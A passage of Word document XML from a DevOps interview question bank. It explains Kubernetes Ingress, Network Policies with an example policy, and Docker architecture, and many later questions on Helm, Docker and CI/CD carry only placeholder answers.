        <w:t>Key features</w:t>
        <w:br/>
        <w:t>1. Host-based routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * app1.example.com</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * app2.example.com</w:t>
        <w:br/>
        <w:t>2. Path-based routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * /api → backend</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * / → frontend</w:t>
        <w:br/>
        <w:t>3. TLS termination</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handles HTTPS certificates</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Offloads encryption from services</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Ingress vs Service</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Service</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Ingress</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Layer</w:t>
        <w:br/>
        <w:tab/>
        <w:t>L4 (TCP/UDP)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>L7 (HTTP/HTTPS)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Access</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Direct pod access</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Smart routing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Internal/external exposure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>External HTTP routing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of Kubernetes as a building:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Services = individual offices</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ingress = reception desk that directs visitors to correct office</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ingress Controller = receptionist following rules</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key point</w:t>
        <w:br/>
        <w:t>Ingress provides centralized, rule-based external HTTP/HTTPS routing into Kubernetes services.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Ingress in Kubernetes is a resource that defines rules for external HTTP and HTTPS traffic routing to internal services based on hostnames and paths, while an Ingress Controller implements these rules and manages the actual traffic routing within the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q34. Explain Network Policies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Network Policies in Kubernetes are rules that control how Pods communicate with each other and with external endpoints at the IP and port level.</w:t>
        <w:br/>
        <w:t>They act like a firewall for Pods inside a cluster.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A Network Policy defines which traffic is allowed or blocked between Pods.</w:t>
        <w:br/>
        <w:t>By default:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * All Pods can communicate with all other Pods (open network)</w:t>
        <w:br/>
        <w:t>With Network Policies:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * You explicitly allow only specific traffic</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Network Policies are used</w:t>
        <w:br/>
        <w:t>They help to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Improve cluster security</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Isolate applications (multi-tenant environments)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Restrict database access</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Control east-west traffic (service-to-service)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Reduce attack surface inside cluster</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t>Network Policies are enforced by a CNI plugin (Container Network Interface) that supports them, such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Calico</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Cilium</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Weave Net</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important concept</w:t>
        <w:br/>
        <w:t>👉 Network Policies are opt-in</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * If no policy exists → all traffic is allowed</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Once a policy selects a Pod → default-deny behavior applies (for that Pod)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of traffic rules</w:t>
        <w:br/>
        <w:t>1. Ingress (incoming traffic)</w:t>
        <w:br/>
        <w:t>Controls who can send traffic to the Pod.</w:t>
        <w:br/>
        <w:t>2. Egress (outgoing traffic)</w:t>
        <w:br/>
        <w:t>Controls where the Pod can send traffic.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Network Policy</w:t>
        <w:br/>
        <w:t>apiVersion: networking.k8s.io/v1</w:t>
        <w:br/>
        <w:t>kind: NetworkPolicy</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: allow-app-to-db</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  podSelector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    matchLabels:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      role: db</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  policyTypes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - Ingress</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  ingress:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - from:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - podSelector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        matchLabels:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          role: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - protocol: TCP</w:t>
        <w:br/>
        <w:t xml:space="preserve">      port: 5432</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What this means</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Only Pods with label role=app</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Can access Pods with role=db</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Only on port 5432 (PostgreSQL)</w:t>
        <w:br/>
        <w:t>Everything else is blocked.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key components</w:t>
        <w:br/>
        <w:t>1. podSelector</w:t>
        <w:br/>
        <w:t>Selects which Pods the policy applies to</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. ingress rules</w:t>
        <w:br/>
        <w:t>Defines allowed incoming traffic</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. egress rules</w:t>
        <w:br/>
        <w:t>Defines allowed outgoing traffic</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. namespaceSelector (optional)</w:t>
        <w:br/>
        <w:t>Controls traffic between namespaces</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. ports</w:t>
        <w:br/>
        <w:t>Restricts allowed ports and protocols</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Default behavior</w:t>
        <w:br/>
        <w:t>Scenario</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Behavior</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No NetworkPolicy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>All traffic allowed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Policy exists for Pod</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Only allowed traffic passes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of Pods like rooms in a building:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * No policy → all doors open</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Network Policy → security guard decides who can enter or leave each room</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Database isolation (only backend can access DB)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Microservice segmentation</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Blocking external access to internal services</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Securing multi-tenant clusters</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important limitation</w:t>
        <w:br/>
        <w:t>Network Policies only work if:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Your CNI supports them (e.g., Calico, Cilium)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Otherwise they are ignored</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Start with default-deny policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Explicitly allow required traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Use labels consistently</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Combine ingress + egress rules for full control</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A Network Policy in Kubernetes is a security resource that defines rules for controlling ingress and egress traffic at the Pod level, acting as a firewall within the cluster and enforcing communication restrictions based on labels, namespaces, ports, and protocols using a compatible CNI plugin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q35. How do you troubleshoot CrashLoopBackOff?</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troubleshoot CrashLoopBackOff?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q36. How do you debug a pending pod?</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debug a pending pod?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q37. What commands do you use for troubleshooting?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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commands do you use for troubleshooting?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q38. Explain Helm.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Helm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Helm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Helm.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q39. How have you organized Helm charts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Helm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Helm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have you organized Helm charts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q40. How do you deploy applications using Helm?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Helm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Helm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deploy applications using Helm?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q41. Explain Docker architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Docker Architecture</w:t>
        <w:br/>
        <w:t>Docker follows a client-server architecture consisting of the Docker Client, Docker Daemon, Docker Host, and Docker Registry.</w:t>
        <w:br/>
        <w:t>Components</w:t>
        <w:br/>
        <w:t>1. Docker Client</w:t>
        <w:br/>
        <w:t>The Docker Client is the interface through which users interact with Docker.</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t>docker build</w:t>
        <w:br/>
        <w:t>docker run</w:t>
        <w:br/>
        <w:t>docker pull</w:t>
        <w:br/>
        <w:t>docker push</w:t>
        <w:br/>
        <w:t>The client sends requests to the Docker Daemon using REST APIs.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Docker Daemon (dockerd)</w:t>
        <w:br/>
        <w:t>The Docker Daemon is the core Docker service that:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Builds images</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Creates and manages containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Manages networks</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Manages volumes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Communicates with registries</w:t>
        <w:br/>
        <w:t>It runs in the background and listens for Docker API requests.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Docker Host</w:t>
        <w:br/>
        <w:t>The machine where Docker is installed.</w:t>
        <w:br/>
        <w:t>It contains:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Docker Daemon</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Images</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Networks</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Volumes</w:t>
        <w:br/>
        <w:t>A host can run multiple containers simultaneously.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Docker Registry</w:t>
        <w:br/>
        <w:t>A registry stores Docker images.</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Docker Hub</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Amazon Web Services ECR</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Google Cloud Artifact Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Microsoft ACR</w:t>
        <w:br/>
        <w:t>Images are:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pulled from registries</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pushed to registries</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Architecture Flow</w:t>
        <w:br/>
        <w:t>Developer</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>docker run/build/pull</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ▼</w:t>
        <w:br/>
        <w:t>Docker Client</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>REST API</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ▼</w:t>
        <w:br/>
        <w:t>Docker Daemon (dockerd)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ┌──┴──────────────┐</w:t>
        <w:br/>
        <w:t xml:space="preserve"> │                 │</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ▼                 ▼</w:t>
        <w:br/>
        <w:t>Images         Containers</w:t>
        <w:br/>
        <w:t xml:space="preserve"> │</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ▼</w:t>
        <w:br/>
        <w:t>Docker Registry</w:t>
        <w:br/>
        <w:t>Container Runtime Layer</w:t>
        <w:br/>
        <w:t>Modern Docker uses:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * containerd → Container lifecycle management</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * runc → Creates and runs containers according to OCI standards</w:t>
        <w:br/>
        <w:t>Flow:</w:t>
        <w:br/>
        <w:t>Docker Client</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Docker Daemon</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>containerd</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>runc</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker run nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. User executes:</w:t>
        <w:br/>
        <w:t>docker run nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. Docker Client sends request to Docker Daemon.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               3. Daemon checks if the image exists locally.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               4. If not found, it pulls the image from the registry.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               5. Docker creates a container from the image.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               6. Container starts and runs the Nginx process.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Docker uses a client-server architecture. The Docker Client communicates with the Docker Daemon through REST APIs. The Docker Daemon is responsible for building images, creating containers, managing networks and volumes, and interacting with registries such as Docker Hub. Under the hood, Docker uses containerd and runc to create and manage containers. When a user executes commands like docker run, the client sends the request to the daemon, which pulls the required image from a registry if necessary and then creates and starts the container on the Docker host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q42. What is the difference between Docker and Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker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Docker and Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q43. Explain Dockerfile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker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Dockerfile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q44. What are Docker volumes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker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Docker volumes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q45. What are Docker networks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker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Docker networks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q46. Explain multi-stage Docker builds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker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multi-stage Docker builds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q47. Explain your CI/CD pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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your CI/CD pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q48. Which CI/CD tools have you used?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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CI/CD tools have you used?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q49. Explain Jenkins pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Jenkins pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q50. Explain GitLab CI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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GitLab CI.</w:t>
      </w:r>
